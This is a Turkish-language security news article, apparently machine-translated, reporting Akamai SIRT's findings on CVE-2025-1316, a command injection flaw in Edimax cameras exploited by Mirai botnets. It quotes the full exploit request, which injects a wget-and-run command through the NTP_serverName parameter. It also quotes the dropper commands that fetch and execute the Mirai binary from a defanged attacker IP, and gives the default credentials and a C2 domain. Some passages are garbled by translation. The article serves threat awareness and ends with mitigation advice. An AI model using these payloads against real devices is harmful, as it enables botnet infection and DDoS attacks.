Akamai Güvenlik İstihbaratı ve Müdahale Ekibinden (SIRT) yakın tarihli bir uyarı, Ediimax Nesnelerin İnterneti (IoT) cihazlarında ciddi bir komut enjeksiyon kırılganlığının sömürülmesini vurguladı.
CVE-2025-1316 olarak adlandırılan bu güvenlik açığı, Mirai kötü amaçlı yazılımları yaymak için birden fazla botnet tarafından aktif olarak kullanılmıştır.
Mirai, IoT cihazlarından ödün vermek ve dağıtılmış hizmet reddi (DDOS) saldırılarını düzenlemekle ünlüdür.
Güvenlik Açığı Genel Bakış
CVE-2025-1316 Güvenlik Açığı, EDIMAX cihazlarındaki /camera-cgi/admin/param.cgi uç noktasını hedefler ve saldırganların IPCAMSource parametresindeki NTP_ServerName seçeneğine komutları enjekte etmesine izin verir.
Başarılı bir sömürü için, Yönetici: 1234 gibi varsayılan kimlik bilgileri kullanılır. Her ne kadar CVE özellikle EDIMAX’ın IC-7100 ağ kamerasından bahsediyor olsa da, güvenlik açığı muhtemelen daha geniş bir EDIMAX cihazını etkiler.
Akamai Sirt ilk olarak Ekim 2024’ün başlarında balayetlerinde bu güvenlik açığını hedefleyen aktiviteyi tespit etti.
Bununla birlikte, kavramın (POC) kanıtı, Haziran 2023’e kadar uzanıyor. Gözlenen en eski istismar girişimleri Mayıs 2024’te, Eylül 2024 ve Ocak-2025 yıllarında artışlarla.
Bu saldırılar Mirai varyantları da dahil olmak üzere farklı botnetlere atfedildi.
Örnek İstismar Kodu
İstismar, cihazda bir kabuk komut dosyası yürütmek için komutlar enjekte eder. İşte istek yüküne bir örnek:
/camera-cgi/admin/param.cgi action=update&ipcamSource=/ntp.asp?r=20130724&NTP_enable=1&NTP_serverName=;$(cd /tmp; wget http://193.143.1[.]118/curl.sh; chmod 777 curl.sh; sh curl.sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0Bu senaryo, ARM, MIPS ve X86 gibi farklı mimariler için bir Mirai kötü amaçlı yazılım varyantı indirir ve yürütür.
Kötü amaçlı yazılım yürütme komutları
İndirildikten sonra, kötü amaçlı yazılım şu komutlarla yürütülür:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget http://193.143.1[.]118/x86;
curl -O http://193.143.1[.]118/x86;
cat x86 > OSGt;
chmod +x *;
./OSGt joined;
rm -rf OSGtBenzer komutlar MIP’ler ve ARM gibi diğer mimariler için kullanılır.
Mirai Botnets
Bu güvenlik açığından yararlanan iki farklı botnet tespit edilmiştir:
- İlk Botnet: Bu botnet, bir curl.sh komut dosyasını indirmek ve yürütmek için istismar kullanır. Angela.spklove aracılığıyla Komut ve Kontrol (C2) sunucusu ile iletişim kurar[.]Port 3093 üzerinden com. Kötü amaçlı yazılım, yürütme üzerine “vairhere” yazdırır.
- İkinci botnet: Bu botnet, Mirai kötü amaçlı yazılımları yürüten bir wget.sh komut dosyasını indirir ve çalıştırır. Kötü amaçlı yazılım anti -takma işlevlerini içerir ve “Merhaba, Dünya!” infaz üzerine.
Her iki botnet de Totolink cihazlarını etkileyen CVE-2024-7214 de dahil olmak üzere bilinen birkaç güvenlik açıkından yararlanır.
Azaltma ve öneriler
Bu tehditlere karşı korumak için:
- Yükseltme Cihazları: Eski veya savunmasız cihazları daha yeni modellerle değiştirin.
- Varsayılan kimlik bilgilerini değiştirin: Tüm cihazların güçlü, benzersiz şifreler kullandığından emin olun.
- İzleme Ağları: Olağandışı trafik modelleri gibi şüpheli aktiviteleri izleyin.
- Güvenlik Önlemlerini Uygula: İstismar girişimlerini engellemek için güvenlik duvarları ve saldırı algılama sistemlerini kullanın.
Mirai kötü amaçlı yazılımların mirası IoT güvenliğini etkilemeye devam ettiğinden, bu cihazların korunması için bilgilendirilmiş ve proaktif kalmak çok önemlidir.
EDIMAX IoT cihazlarının devam eden sömürüsü, eski ürün yazılımı ve Mirai kötü amaçlı yazılımların yaygın tehdidiyle ilişkili kalıcı riskleri vurgulamaktadır.
Düzenli izleme ve proaktif güvenlik stratejileri, gelişen siber tehditlere karşı korunmada esastır.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.